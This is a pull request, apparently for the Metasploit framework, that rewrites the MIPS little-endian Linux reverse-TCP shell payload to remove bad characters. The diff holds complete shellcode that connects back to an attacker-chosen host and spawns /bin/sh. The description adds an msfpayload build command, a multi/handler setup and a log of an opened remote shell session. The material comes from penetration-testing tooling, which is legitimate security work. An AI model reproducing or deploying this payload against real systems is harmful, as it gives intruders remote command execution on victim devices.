### PR TITLE
Improve shell_reverse_tcp mipsle payload

### DIFF
--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -21,7 +21,11 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Linux Command Shell, Reverse TCP Inline',
       'Description'   => 'Connect back to attacker and spawn a command shell',
-      'Author'        => 'Julien Tinnes',
+      'Author'        =>
+        [
+          'rigan <imrigan[at]gmail.com>', # Original shellcode
+          'juan vazquez' # Metasploit module
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSLE,
@@ -47,74 +51,70 @@ module Metasploit3
     port = [port].pack("n").unpack("cc")
 
     shellcode =
-      "\xef\xff\x09\x24" +                  # li	t1,-17
-      "\xff\xff\x10\x05" +                  # bltzal	t0,0x4
-      "\x82\x82\x08\x28" +                  # slti	t0,zero,-32126
-      "\x27\x48\x20\x01" +                  # nor	t1,t1,zero
-      "\x21\xc8\x3f\x01" +                  # addu	t9,t1,ra
-      "\x48\x85\xb9\xaf" +                  # sw	t9,-31416(sp)
-      "\x48\x85\xb9\x23" +                  # addi	t9,sp,-31416
-      "\x00\x00\x1c\x3c" +                  # lui	gp,0x0
-      "\x00\x00\x9c\x27" +                  # addiu	gp,gp,0
-      "\x21\xe0\x99\x03" +                  # addu	gp,gp,t9
-      "\x00\x00\x89\x8f" +                  # lw	t1,0(gp)
-      "\xd8\xff\xbd\x27" +                  # addiu	sp,sp,-40
-      "\xe8\x00\x2a\x25" +                  # addiu	t2,t1,232
-      "\x04\x00\x47\x8d" +                  # lw	a3,4(t2)
-      "\xe8\x00\x28\x8d" +                  # lw	t0,232(t1)
-      host[2..3].pack("C2") + "\x04\x3c" +  # lui	a0,0x901
-      host[0..1].pack("C2") + "\x83\x34" +  # ori	v1,a0,0xa8c0
-      "\x18\x00\xb9\x27" +                  # addiu	t9,sp,24
-      "\x02\x00\x06\x24" +                  # li	a2,2
-      port.pack("C2") + "\x05\x24" +        # li	a1,9746
-      "\x08\x00\xa6\xa7" +                  # sh	a2,8(sp)
-      "\x0a\x00\xa5\xa7" +                  # sh	a1,10(sp)
-      "\x18\x00\xa8\xaf" +                  # sw	t0,24(sp)
-      "\x1c\x00\xa7\xaf" +                  # sw	a3,28(sp)
-      "\x0c\x00\xa3\xaf" +                  # sw	v1,12(sp)
-      "\x20\x00\xb9\xaf" +                  # sw	t9,32(sp)
-      "\x24\x00\xa0\xaf" +                  # sw	zero,36(sp)
-      "\x02\x00\x04\x24" +                  # li	a0,2
-      "\x02\x00\x05\x24" +                  # li	a1,2
-      "\x21\x30\x00\x00" +                  # move	a2,zero
-      "\x57\x10\x02\x24" +                  # li	v0,4183
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x21\x18\x40\x00" +                  # move	v1,v0
-      "\xff\xff\x02\x24" +                  # li	v0,-1
-      "\x1a\x00\x62\x10" +                  # beq	v1,v0,0xf4
-      "\x01\x00\x04\x24" +                  # li	a0,1
-      "\x21\x20\x60\x00" +                  # move	a0,v1
-      "\x08\x00\xa5\x27" +                  # addiu	a1,sp,8
-      "\x10\x00\x06\x24" +                  # li	a2,16
-      "\x4a\x10\x02\x24" +                  # li	v0,4170
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x0e\x00\x40\x14" +                  # bnez	v0,0xe0
-      "\x21\x28\x00\x00" +                  # move	a1,zero
-      "\xdf\x0f\x02\x24" +                  # li	v0,4063
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x01\x00\x05\x24" +                  # li	a1,1
-      "\xdf\x0f\x02\x24" +                  # li	v0,4063
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x02\x00\x05\x24" +                  # li	a1,2
-      "\xdf\x0f\x02\x24" +                  # li	v0,4063
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x21\x30\x00\x00" +                  # move	a2,zero
-      "\x21\x20\x20\x03" +                  # move	a0,t9
-      "\x20\x00\xa5\x27" +                  # addiu	a1,sp,32
-      "\xab\x0f\x02\x24" +                  # li	v0,4011
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x21\x20\x00\x00" +                  # move	a0,zero
-      "\xa1\x0f\x02\x24" +                  # li	v0,4001
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\x08\x00\xe0\x03" +                  # jr	ra
-      "\x28\x00\xbd\x27" +                  # addiu	sp,sp,40
-      "\xa1\x0f\x02\x24" +                  # li	v0,4001
-      "\x0c\x01\x01\x01" +                  # syscall
-      "\xe5\xff\x00\x10" +                  # b	0x94
-      "\x21\x20\x60\x00" +                  # move	a0,v1
-      "\x2f\x62\x69\x6e" +                  # "/bin"
-      "\x2f\x73\x68\x00" +                  # "/sh\x00"
-      "0"*80
+      # sys_socket
+      # a0: domain
+      # a1: type
+      # a2: protocol
+      "\xfa\xff\x0f\x24" + # li t7,-6
+      "\x27\x78\xe0\x01" + # nor t7,t7,zero
+      "\xfd\xff\xe4\x21" + # addi a0,t7,-3
+      "\xfd\xff\xe5\x21" + # addi a1,t7,-3
+      "\xff\xff\x06\x28" + # slti a2,zero,-1
+      "\x57\x10\x02\x24" + # li v0,4183 # sys_socket
+      "\x0c\x01\x01\x01" + # syscall 0x40404
+      # sys_connect
+      # a0: sockfd (stored on the stack)
+      # a1: addr (data stored on the stack)
+      # a2: addrlen
+      "\xff\xff\xa2\xaf" + # sw v0,-1(sp)
+      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
+      "\xfd\xff\x0f\x34" + # li t7,0xfffd
+      "\x27\x78\xe0\x01" + # nor t7,t7,zero
+      "\xe2\xff\xaf\xaf" + # sw t7,-30(sp)
+      port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f90
+      port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
+      "\xe4\xff\xae\xaf" + # sw t6,-28(sp)
+      host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
+      host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
+      "\xe6\xff\xae\xaf" + # sw t6,-26(sp)
+      "\xe2\xff\xa5\x27" + # addiu a1,sp,-30
+      "\xef\xff\x0c\x24" + # li t4,-17
+      "\x27\x30\x80\x01" + # nor a2,t4,zero
+      "\x4a\x10\x02\x24" + # li v0,4170  # sys_connect
+      "\x0c\x01\x01\x01" + # syscall 0x40404
+
+      # sys_dup2
+      # a0: oldfd (socket)
+      # a1: newfd (0, 1, 2)
+      "\xfd\xff\x0f\x24" + # li t7,-3
+      "\x27\x78\xe0\x01" + # nor t7,t7,zero
+      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
+      "\x21\x28\xe0\x01" + # move a1,t7
+      "\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2
+      "\x0c\x01\x01\x01" + # syscall 0x40404
+      "\xff\xff\x10\x24" + # li s0,-1
+      "\xff\xff\xef\x21" + # addi t7,t7,-1
+      "\xfa\xff\xf0\x15" + # bne t7,s0,68 <dup2_loop>
+
+      # sys_execve
+      # a0: filename (stored on the stack) "//bin/sh"
+      # a1: argv "//bin/sh"
+      # a2: envp (null)
+      "\xff\xff\x06\x28" + # slti a2,zero,-1
+      "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
+      "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
+      "\xec\xff\xaf\xaf" + # sw t7,-20(sp)
+      "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
+      "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
+      "\xf0\xff\xae\xaf" + # sw t6,-16(sp)
+      "\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
+      "\xec\xff\xa4\x27" + # addiu a0,sp,-20
+      "\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
+      "\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
+      "\xf8\xff\xa5\x27" + # addiu a1,sp,-8
+      "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve
+      "\x0c\x01\x01\x01"  # syscall 0x40404
+    return super + shellcode
   end
 
 end

--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
-# + Few removals of unneccessary zero bytes by kost
-
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
@@ -23,7 +20,7 @@ module Metasploit3
       'Description'   => 'Connect back to attacker and spawn a command shell',
       'Author'        =>
         [
-          'rigan <imrigan[at]gmail.com>', # Original shellcode
+          'rigan <imrigan[at]gmail.com>', # Original (mipsbe) shellcode
           'juan vazquez' # Metasploit module
         ],
       'License'       => MSF_LICENSE,
@@ -62,6 +59,7 @@ module Metasploit3
       "\xff\xff\x06\x28" + # slti a2,zero,-1
       "\x57\x10\x02\x24" + # li v0,4183 # sys_socket
       "\x0c\x01\x01\x01" + # syscall 0x40404
+
       # sys_connect
       # a0: sockfd (stored on the stack)
       # a1: addr (data stored on the stack)
@@ -114,6 +112,7 @@ module Metasploit3
       "\xf8\xff\xa5\x27" + # addiu a1,sp,-8
       "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve
       "\x0c\x01\x01\x01"  # syscall 0x40404
+
     return super + shellcode
   end
 

--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -84,15 +84,15 @@ module Metasploit3
       # sys_dup2
       # a0: oldfd (socket)
       # a1: newfd (0, 1, 2)
-      "\xfd\xff\x0f\x24" + # li t7,-3
-      "\x27\x78\xe0\x01" + # nor t7,t7,zero
+      "\xfd\xff\x11\x24" + # li s1,-3
+      "\x27\x88\x20\x02" + # nor s1,s1,zero
       "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
-      "\x21\x28\xe0\x01" + # move a1,t7
+      "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
       "\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2
       "\x0c\x01\x01\x01" + # syscall 0x40404
       "\xff\xff\x10\x24" + # li s0,-1
-      "\xff\xff\xef\x21" + # addi t7,t7,-1
-      "\xfa\xff\xf0\x15" + # bne t7,s0,68 <dup2_loop>
+      "\xff\xff\x31\x22" + # addi s1,s1,-1
+      "\xfa\xff\x30\x16" + # bne s1,s0,68 <dup2_loop>
 
       # sys_execve
       # a0: filename (stored on the stack) "//bin/sh"


### PR DESCRIPTION
Same history than #2542. The current shell_reverse_tcp for mipsle includes a several instances of common badchars like \x00\x0a. This pull requests modifies the shell_reverse_tcp mipsle payload for a shorter version without these common badchars.
## Verification steps
- [x] Generate an elf with the payload embedded with the help of msfpayload:

```
$ ./msfpayload linux/mipsle/shell_reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsle/shell_reverse_tcp
 Length: 184
Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}
```
- [x] Upload the payload to a mipsle linux system providing "/bin/sh". Provide +x permissions with chmod
- [x] Run the msfconsole and use the exploit/multi/handler with the same payload:

```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload linux/mipsle/shell_reverse_tcp 
payload => linux/mipsle/shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
```
- [ ] Executhe the payload on the target linux misple, you should enjoy a new session on the console:

```
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.134:58972) at 2014-01-07 09:57:04 -0600

id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
uname -a
Linux debian 2.6.32-5-4kc-malta #1 Fri Feb 15 18:09:19 UTC 2013 mips GNU/Linux
file /bin/ls
/bin/ls: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability 0xf41 = 0x756e6700, with unknown capability 0x70100 = 0x1040000, stripped
^C
Abort session 1? [y/N]  y

[*] 192.168.172.134 - Command shell session 1 closed.  Reason: User exit
msf exploit(handler) > 
```
